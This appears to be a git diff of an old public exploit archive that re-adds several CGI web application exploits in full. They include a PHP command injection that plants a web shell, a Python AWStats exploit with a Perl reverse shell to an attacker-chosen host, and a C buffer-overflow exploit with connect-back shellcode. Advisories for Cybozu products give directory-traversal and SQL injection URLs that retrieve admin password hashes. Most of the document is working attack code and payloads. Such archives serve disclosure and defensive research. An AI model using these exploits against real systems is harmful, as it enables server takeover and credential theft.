1 -> retrieve application path +$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +$temp=explode("name=\"pfad\" value=\"",$html); +$temp2=explode("\"",$temp[1]); +$pfad=$temp2[0]; +if ($pfad=='') {die("cannot retrieve document root...\r\n");} +echo "document root ->".$pfad."\r\n"; + + +//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric +$temp=";echo \ > ".$pfad."/phpinfo.php"; +$temp=urlencode($temp); +$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); + +//step 3 -> launch commands +$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +echo $html; +?> + +# milw0rm.com [2006-04-14] diff --git a/platforms/cgi/webapps/1755.py b/platforms/cgi/webapps/1755.py index a76a0cf6e..e6a7cd545 100755 --- a/platforms/cgi/webapps/1755.py +++ b/platforms/cgi/webapps/1755.py @@ -1,131 +1,131 @@ -#!/usr/bin/env python -# http://secunia.com/advisories/19969/ -# by redsand@blacksecurity.org -# May 5, 2006 - HAPPY CINCO DE MAYO -# HAPPY BIRTHDAY DAD -# private plz - - -# -# redsand@jinxy ~/ $ nc -l -p 31337 -v -# listening on [any] 31337 ... -# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377 -# id -# uid=81(apache) gid=81(apache) groups=81(apache) -# - - -import sys, socket, base64 -import urllib2, urlparse, urllib - -# perl 1 line tcp connect-back code -# needs ip & port -cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\''; - -class rbawstatsMigrate: - __url = '' - __user = '' - __password = '' - __auth = False - __chost =False - __cport = False - - def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False): - if host: - self.__url = host - if ur: - self.__user = ur - if ps: - self.__password = ps - - if ur or ps: self.__auth = True - - - if chost: self.__chost = chost - if cport: self.__cport = cport - - - url = urlparse.urlsplit(self.__url) - - i = url[1].find(';') - if i >= 0: - self.__parsed_host = url[1][:i] - else: - self.__parsed_host = url[1] - - def probe(self): - - cphost = socket.gethostbyname_ex(self.__chost) - - my_cmd = cmd % (cphost[2][0],self.__cport) - url_xpl = { "config": self.__parsed_host, - "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host) - # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host) - - } - - #if self.__url[len(self.__url) -1] != '?': - # url_xpl = '?' + url_xpl - - url = self.__url - url_xpl = urllib.urlencode(url_xpl) - - try: - req = urllib2.Request(url, url_xpl) - if(self.__auth): - b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1] - req.add_header('Authorization', "Basic %s"% b64str) - - req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org") - req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1') - req.add_header('Accept-Language','en-us') - req.add_header('Accept-Encoding','deflate, gzip') - req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security") - req.add_header('Connection' ,'Keep-Alive') - req.add_header('Cache-Control','no-cache') - q = urllib2.urlopen(req) - except IOError, e: - print "FAILED %s" % e - sys.exit(0) - - print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport) - sys.exit(0) - - - - -user=False -pas=False -url=False -chst=False -cprt=False - -print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org" -print "http://secunia.com/advisories/19969/" -print "http://blacksecurity.org - f0r my h0mi3s" - -argc = len(sys.argv) -if(argc <= 3): - print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0] - print "\t\* Support 401 HTTP Authentication" - sys.exit(0) -if(argc > 1): - url = sys.argv[1] -if(argc > 2): - chst = sys.argv[2] -if(argc > 3): - cprt = sys.argv[3] -if(argc > 4): - user = sys.argv[4] -if(argc > 5): - pas = sys.argv[5] - - - - - -red = rbawstatsMigrate(url, user, pas, chst, cprt) - -red.probe() - -# milw0rm.com [2006-05-06] +#!/usr/bin/env python +# http://secunia.com/advisories/19969/ +# by redsand@blacksecurity.org +# May 5, 2006 - HAPPY CINCO DE MAYO +# HAPPY BIRTHDAY DAD +# private plz + + +# +# redsand@jinxy ~/ $ nc -l -p 31337 -v +# listening on [any] 31337 ... +# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377 +# id +# uid=81(apache) gid=81(apache) groups=81(apache) +# + + +import sys, socket, base64 +import urllib2, urlparse, urllib + +# perl 1 line tcp connect-back code +# needs ip & port +cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\''; + +class rbawstatsMigrate: + __url = '' + __user = '' + __password = '' + __auth = False + __chost =False + __cport = False + + def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False): + if host: + self.__url = host + if ur: + self.__user = ur + if ps: + self.__password = ps + + if ur or ps: self.__auth = True + + + if chost: self.__chost = chost + if cport: self.__cport = cport + + + url = urlparse.urlsplit(self.__url) + + i = url[1].find(';') + if i >= 0: + self.__parsed_host = url[1][:i] + else: + self.__parsed_host = url[1] + + def probe(self): + + cphost = socket.gethostbyname_ex(self.__chost) + + my_cmd = cmd % (cphost[2][0],self.__cport) + url_xpl = { "config": self.__parsed_host, + "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host) + # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host) + + } + + #if self.__url[len(self.__url) -1] != '?': + # url_xpl = '?' + url_xpl + + url = self.__url + url_xpl = urllib.urlencode(url_xpl) + + try: + req = urllib2.Request(url, url_xpl) + if(self.__auth): + b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1] + req.add_header('Authorization', "Basic %s"% b64str) + + req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org") + req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1') + req.add_header('Accept-Language','en-us') + req.add_header('Accept-Encoding','deflate, gzip') + req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security") + req.add_header('Connection' ,'Keep-Alive') + req.add_header('Cache-Control','no-cache') + q = urllib2.urlopen(req) + except IOError, e: + print "FAILED %s" % e + sys.exit(0) + + print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport) + sys.exit(0) + + + + +user=False +pas=False +url=False +chst=False +cprt=False + +print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org" +print "http://secunia.com/advisories/19969/" +print "http://blacksecurity.org - f0r my h0mi3s" + +argc = len(sys.argv) +if(argc <= 3): + print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0] + print "\t\* Support 401 HTTP Authentication" + sys.exit(0) +if(argc > 1): + url = sys.argv[1] +if(argc > 2): + chst = sys.argv[2] +if(argc > 3): + cprt = sys.argv[3] +if(argc > 4): + user = sys.argv[4] +if(argc > 5): + pas = sys.argv[5] + + + + + +red = rbawstatsMigrate(url, user, pas, chst, cprt) + +red.probe() + +# milw0rm.com [2006-05-06] diff --git a/platforms/cgi/webapps/179.c b/platforms/cgi/webapps/179.c index 8ee6dfd1e..73a736c76 100755 --- a/platforms/cgi/webapps/179.c +++ b/platforms/cgi/webapps/179.c @@ -356,6 +356,6 @@ int main(int argc, char **argv) news_update_exploit(argv[1], buf); return (0); } - - -// milw0rm.com [2000-11-15] + + +// milw0rm.com [2000-11-15] diff --git a/platforms/cgi/webapps/1862.c b/platforms/cgi/webapps/1862.c index fee4fb326..41e794289 100755 --- a/platforms/cgi/webapps/1862.c +++ b/platforms/cgi/webapps/1862.c @@ -1,173 +1,173 @@ -/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) - * Name: ishopcart-cgi-bof.c (<= easy-scart6.c) - * Date: 5/25/2006 - * Version: - * 1.00 (5/25/2006) - ishopcart-cgi-bof.c created - * - * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead - * reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete - * code execution is spawned, with the code being a connectback shell. - * - * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache - * was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with - * some forking shellcode to accomplish the workaround. - * - * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99 -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 80 -#define CB_PORT 31337 -#define IP_OFFSET 33 + 13 -#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod added to cb[] -#define OFFSET 0x41414141 // find your own damn offset, the code works 100% any fault is on yourself - -void changeip(char *ip); -void changeport(char *code, int port, int offset); -void help(void); - -// netric callback shellcode -char cb[] = - "\x31\xc0\x31\xdb" - - "\xb0\x02" // movb $0x2,%al / sys_fork (2) - "\xcd\x80" // int $0x80 - "\x38\xc3" // cmpl %ebx,%eax / check if child; %eax = 0x0 - "\x74\x05" // je 0x5 / jump after the exit if we're the child - // sys_exit (1) - "\x8d\x43\x01" // leal 0x1(%ebx),%eax / sys_exit (1) if we're the parent - "\xcd\x80" // int $0x80 / interrupt 80 to execute sys_exit - - "\x31\xc9\x51\xb1" - "\x06\x51\xb1\x01\x51\xb1\x02\x51" - "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" - "\x89\xc2\x31\xc0\x31\xc9\x51\x51" - "\x68\x41\x42\x43\x44\x66\x68\xb0" - "\xef\xb1\x02\x66\x51\x89\xe7\xb3" - "\x10\x53\x57\x52\x89\xe1\xb3\x03" - "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" - "\x74\x06\x31\xc0\xb0\x01\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" - "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" - "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" - "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" - "\x50\x68\x6e\x2f\x73\x68\x68\x2f" - "\x2f\x62\x69\x89\xe3\x50\x53\x89" - "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" - "\x01\xcd\x80"; - -int main (int argc, char **argv) { - int sock; - unsigned offset = OFFSET, ipaddr, i = 0; - unsigned short port = PORT, cbport = CB_PORT; - struct sockaddr_in server; - char *host, *location, *cbip, buff[5120], opt; - - host = location = cbip = 0; - - while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { - switch(opt) { - case 'i': - host = optarg; - break; - case 'p': - sscanf(optarg, "%hu", &port); - break; - case 'o': - sscanf(optarg, "%x", &offset); - break; - case 'l': - location = optarg; - break; - case '1': - cbip = optarg; - break; - case '2': - sscanf(optarg, "%hu", &cbport); - break; - } - } - - if (!(host && location && cbip)) { - puts("-!> a required argument was missing\n"); - help(); - exit(1); - } - - changeip(cbip); - changeport(cb, cbport, PORT_OFFSET); - - if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { - printf("socket() error: %s\n", strerror(errno)); - exit(1); - } - server.sin_port = htons(port); - - if ((ipaddr = inet_addr(host)) == -1) { - struct hostent *myhost; - if ((myhost = gethostbyname(host)) == 0) { - printf("-!> failed to resolve host '%s'\n", host); - exit(1); - } - memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); - } - else server.sin_addr.s_addr = ipaddr; - - server.sin_family = AF_INET; - memset(&(server.sin_zero), 0, 8); - - if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { - printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); - exit(1); - } - sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); - send(sock, buff, strlen(buff), 0); - - for (0; i < 4000; i++) *(buff+i) = 0x90; - for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); - for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); - - strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); - - - send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); -} - -void help (void) { - char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL (5/24/2006)\n\n" - "-i <%s> \t - specifies the vulnerable host; default 80\n" - "-p [%hu] \t - specifies the vulnerable host's port\n" - "-l <%s> \t - specifies the vulnerable CGI location\n" - "-o [%x] \t - forces an explicit offset\n" - "-1 <%s> \t - specifies the connect back ip\n" - "-2 [%hu] \t - specifies the connect back port; default 31337\n" - "-h \t - shows this help\n"; - - puts(string); -} - -void changeip(char *ip) { - char *ptr; - ptr=cb+IP_OFFSET; - /* Assume Little-Endianess.... */ - *((long *)ptr)=inet_addr(ip); -} - -// ripped from some of snooq's code -void changeport(char *code, int port, int offset) { - char *ptr; - ptr=code+offset; - /* Assume Little-Endianess.... */ - *ptr++=(char)((port>>8)&0xff); - *ptr++=(char)(port&0xff); -} - -// milw0rm.com [2006-06-02] +/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org) + * Name: ishopcart-cgi-bof.c (<= easy-scart6.c) + * Date: 5/25/2006 + * Version: + * 1.00 (5/25/2006) - ishopcart-cgi-bof.c created + * + * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead + * reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete + * code execution is spawned, with the code being a connectback shell. + * + * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache + * was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with + * some forking shellcode to accomplish the workaround. + * + * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99 +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PORT 80 +#define CB_PORT 31337 +#define IP_OFFSET 33 + 13 +#define PORT_OFFSET 39 + 13 // + 13 to these for the new forking mod added to cb[] +#define OFFSET 0x41414141 // find your own damn offset, the code works 100% any fault is on yourself + +void changeip(char *ip); +void changeport(char *code, int port, int offset); +void help(void); + +// netric callback shellcode +char cb[] = + "\x31\xc0\x31\xdb" + + "\xb0\x02" // movb $0x2,%al / sys_fork (2) + "\xcd\x80" // int $0x80 + "\x38\xc3" // cmpl %ebx,%eax / check if child; %eax = 0x0 + "\x74\x05" // je 0x5 / jump after the exit if we're the child + // sys_exit (1) + "\x8d\x43\x01" // leal 0x1(%ebx),%eax / sys_exit (1) if we're the parent + "\xcd\x80" // int $0x80 / interrupt 80 to execute sys_exit + + "\x31\xc9\x51\xb1" + "\x06\x51\xb1\x01\x51\xb1\x02\x51" + "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" + "\x89\xc2\x31\xc0\x31\xc9\x51\x51" + "\x68\x41\x42\x43\x44\x66\x68\xb0" + "\xef\xb1\x02\x66\x51\x89\xe7\xb3" + "\x10\x53\x57\x52\x89\xe1\xb3\x03" + "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" + "\x74\x06\x31\xc0\xb0\x01\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" + "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" + "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" + "\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x50\x53\x89" + "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" + "\x01\xcd\x80"; + +int main (int argc, char **argv) { + int sock; + unsigned offset = OFFSET, ipaddr, i = 0; + unsigned short port = PORT, cbport = CB_PORT; + struct sockaddr_in server; + char *host, *location, *cbip, buff[5120], opt; + + host = location = cbip = 0; + + while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { + switch(opt) { + case 'i': + host = optarg; + break; + case 'p': + sscanf(optarg, "%hu", &port); + break; + case 'o': + sscanf(optarg, "%x", &offset); + break; + case 'l': + location = optarg; + break; + case '1': + cbip = optarg; + break; + case '2': + sscanf(optarg, "%hu", &cbport); + break; + } + } + + if (!(host && location && cbip)) { + puts("-!> a required argument was missing\n"); + help(); + exit(1); + } + + changeip(cbip); + changeport(cb, cbport, PORT_OFFSET); + + if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { + printf("socket() error: %s\n", strerror(errno)); + exit(1); + } + server.sin_port = htons(port); + + if ((ipaddr = inet_addr(host)) == -1) { + struct hostent *myhost; + if ((myhost = gethostbyname(host)) == 0) { + printf("-!> failed to resolve host '%s'\n", host); + exit(1); + } + memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); + } + else server.sin_addr.s_addr = ipaddr; + + server.sin_family = AF_INET; + memset(&(server.sin_zero), 0, 8); + + if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { + printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); + exit(1); + } + sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); + send(sock, buff, strlen(buff), 0); + + for (0; i < 4000; i++) *(buff+i) = 0x90; + for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); + for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); + + strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); + + + send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); +} + +void help (void) { + char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL (5/24/2006)\n\n" + "-i <%s> \t - specifies the vulnerable host; default 80\n" + "-p [%hu] \t - specifies the vulnerable host's port\n" + "-l <%s> \t - specifies the vulnerable CGI location\n" + "-o [%x] \t - forces an explicit offset\n" + "-1 <%s> \t - specifies the connect back ip\n" + "-2 [%hu] \t - specifies the connect back port; default 31337\n" + "-h \t - shows this help\n"; + + puts(string); +} + +void changeip(char *ip) { + char *ptr; + ptr=cb+IP_OFFSET; + /* Assume Little-Endianess.... */ + *((long *)ptr)=inet_addr(ip); +} + +// ripped from some of snooq's code +void changeport(char *code, int port, int offset) { + char *ptr; + ptr=code+offset; + /* Assume Little-Endianess.... */ + *ptr++=(char)((port>>8)&0xff); + *ptr++=(char)(port&0xff); +} + +// milw0rm.com [2006-06-02] diff --git a/platforms/cgi/webapps/188.pl b/platforms/cgi/webapps/188.pl index 7a35e85a9..7e6198c0d 100755 --- a/platforms/cgi/webapps/188.pl +++ b/platforms/cgi/webapps/188.pl @@ -90,6 +90,6 @@ sub connect_host { socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); } - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/cgi/webapps/211.c b/platforms/cgi/webapps/211.c index cd0aba50b..6e46ca7e7 100755 --- a/platforms/cgi/webapps/211.c +++ b/platforms/cgi/webapps/211.c @@ -165,6 +165,6 @@ int main(int argc, char **argv) } exit(0); } - - -// milw0rm.com [2000-12-01] + + +// milw0rm.com [2000-12-01] diff --git a/platforms/cgi/webapps/2266.txt b/platforms/cgi/webapps/2266.txt index cb46f70da..22ce7b988 100755 --- a/platforms/cgi/webapps/2266.txt +++ b/platforms/cgi/webapps/2266.txt @@ -1,70 +1,70 @@ -Cybozu Products Arbitrary File Retrieval Vulnerability - -by Tan Chew Keong -Release Date: 2006-08-28 - -Summary - -A vulnerability has been found in Cybozu Products. When exploited, the vulnerability allows -an authenticated user to retrieve arbitrary files accessible to the web server process. - -Tested Versions - * Cybuzu Office Version 6.5 (Build 1.2 20050427121735) for Windows - * Cybozu Share 360 Version 2.5 (Build 0.2 20050121115231) for Windows - - -Details - -This advisory discloses a directory traversal vulnerability in Cybozu products. -1) Cybozu Office File Cabinet File Download Directory Traversal - -Cybuzu Office does not properly validate the "id" parameter in "/scripts/cbag/ag.exe" before -using it to retrieve files from the file cabinet for a logon user. This allows a malicious user -to retrieve arbitrary files accessible to the web server process using directory traversal characters. - -Example (to retrieve the password hash of the admin page): - -http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload&id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin¬imecard=1&type=text&subtype=html&ct=1 - - -2) Cybozu Share 360 File Cabinet and Message Attachment Download Directory Traversal - -Cybuzu Share 360 does not properly validate the "id" parameter in "/scripts/s360v2/s360.exe" -before using it to retrieve files from the file cabinet and to retrieve file attachments from a -received message/memo. This allows a malicious user to retrieve arbitrary files accessible to the -web server process using directory traversal characters. - -Example (to retrieve the password hash of the admin page): - -http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt - -http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid=37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt - - -Patch / Workaround - -Cybuzu Office: -Update to Version 6.6 (Build 1.3). - -Cybozu Share 360: -Update to Version 2.5 (Build 0.3). - -References - -http://cybozu.co.jp/products/dl/notice_060825/ - -Disclosure Timeline - -2006-07-04 - Vulnerability Discovered. -2006-07-13 - Initial Vendor Notification. -2006-07-13 - Initial Vendor Reply. -2006-07-14 - Received scheduled patch release date from vendor. -2006-08-16 - Received notification that patch release will be delayed. -2006-08-25 - Vendor released patch information on website. -2006-08-28 - Public Disclosure. - -Contact -For further enquries, comments, suggestions or bug reports, simply email them to -Tan Chew Keong (chewkeong[at]vuln[dot]sg) - -# milw0rm.com [2006-08-28] +Cybozu Products Arbitrary File Retrieval Vulnerability + +by Tan Chew Keong +Release Date: 2006-08-28 + +Summary + +A vulnerability has been found in Cybozu Products. When exploited, the vulnerability allows +an authenticated user to retrieve arbitrary files accessible to the web server process. + +Tested Versions + * Cybuzu Office Version 6.5 (Build 1.2 20050427121735) for Windows + * Cybozu Share 360 Version 2.5 (Build 0.2 20050121115231) for Windows + + +Details + +This advisory discloses a directory traversal vulnerability in Cybozu products. +1) Cybozu Office File Cabinet File Download Directory Traversal + +Cybuzu Office does not properly validate the "id" parameter in "/scripts/cbag/ag.exe" before +using it to retrieve files from the file cabinet for a logon user. This allows a malicious user +to retrieve arbitrary files accessible to the web server process using directory traversal characters. + +Example (to retrieve the password hash of the admin page): + +http://192.168.1.64/scripts/cbag/ag.exe?page=FileDownload&id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin¬imecard=1&type=text&subtype=html&ct=1 + + +2) Cybozu Share 360 File Cabinet and Message Attachment Download Directory Traversal + +Cybuzu Share 360 does not properly validate the "id" parameter in "/scripts/s360v2/s360.exe" +before using it to retrieve files from the file cabinet and to retrieve file attachments from a +received message/memo. This allows a malicious user to retrieve arbitrary files accessible to the +web server process using directory traversal characters. + +Example (to retrieve the password hash of the admin page): + +http://192.168.1.64/scripts/s360v2/s360.exe?page=FileDownload&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt + +http://192.168.1.64/scripts/s360v2/s360.exe?page=MessageDownload&mid=37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt + + +Patch / Workaround + +Cybuzu Office: +Update to Version 6.6 (Build 1.3). + +Cybozu Share 360: +Update to Version 2.5 (Build 0.3). + +References + +http://cybozu.co.jp/products/dl/notice_060825/ + +Disclosure Timeline + +2006-07-04 - Vulnerability Discovered. +2006-07-13 - Initial Vendor Notification. +2006-07-13 - Initial Vendor Reply. +2006-07-14 - Received scheduled patch release date from vendor. +2006-08-16 - Received notification that patch release will be delayed. +2006-08-25 - Vendor released patch information on website. +2006-08-28 - Public Disclosure. + +Contact +For further enquries, comments, suggestions or bug reports, simply email them to +Tan Chew Keong (chewkeong[at]vuln[dot]sg) + +# milw0rm.com [2006-08-28] diff --git a/platforms/cgi/webapps/2267.txt b/platforms/cgi/webapps/2267.txt index 55e9d209a..9ecbadd89 100755 --- a/platforms/cgi/webapps/2267.txt +++ b/platforms/cgi/webapps/2267.txt @@ -1,114 +1,114 @@ -Cybozu Garoon 2 SQL Injection Vulnerabilities - -by Tan Chew Keong -Release Date: 2006-08-28 - -Summary - -Some SQL injection vulnerabilities have been found in Cybozu Garoon 2. When exploited by a logon user, -the vulnerabilities allow manipulation of SQL statements which can lead to disclosure of information -from the database, or to cause the backend MySQL database to consume large amount of CPU resources. - -Tested Versions - -Cybuzu Garoon 2 Version 2.1.0 for Windows - -Details - -This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2. -1) TODO List View/Modify SQL Injection Cybuzu Garoon 2 does not properly sanitise the "tid" parameter -in the TODO List View and Modify functionality. It is possible for a logon user to exploit this vulnerability -to select values from arbitrary tables in the database. - -When logon as a normal user: -TESTING NOTE a - In order for the examples to work, you must first logon as a user, then click on the TODO List link (icon) to go to the TODO List index page, before using the exploit. -TESTING NOTE b - Example 2 requires that at least 1 TODO List category has been created (category value 1). - - -Example 1: - -To retrieve the admin user's password hash via TODO List View. - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/view?tid=9999999)+union+select+1,null,col_foreign_key,col_password,2,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= - -Example 2: - -To retrieve the admin user's password hash via TODO List Modify. - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/modify?tid=9999999)+union+select+1,null,col_foreign_key,col_password,1,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= - - -2) Workflow View/Print SQL Injection - -Cybuzu Garoon 2 does not properly sanitise the "pid" parameter in the Workflow View and Print functionality. -It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database. - -Example 1: - -To retrieve the admin user's password hash via Workflow View. - -http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/view?fid=9&pid=8888888+union+select+1,2,3,4,5,6,7,8,9,10,11,12,col_foreign_key,14,col_password,16,17,18,19,20,21,22+from+tab_cb_user where _id=1/* - -Example 2: - -To retrieve the admin user's password hash via Workflow Print. - -http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/print?fid=9&pid=7777777+union+select+col_password,2,3,4,col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tab_cb_user where _id=1/* - -Note: In order for example 2 to work, "fid" must be a valid folder ID. - -3) Other SQL Injection Vulnerabilities - -Several other SQL injection vulnerabilities exists. These may e.g. be exploited to cause the MySQL-based Cybozu Database Engine to consume large amount of CPU resources, potentially causing a DoS. - -SQL Injection: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1[SQL]&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1[SQL]&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1[SQL] -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1[SQL] - -Test Samples: - -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=' -http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=' -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1' -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1'&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1'&did= -http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1' 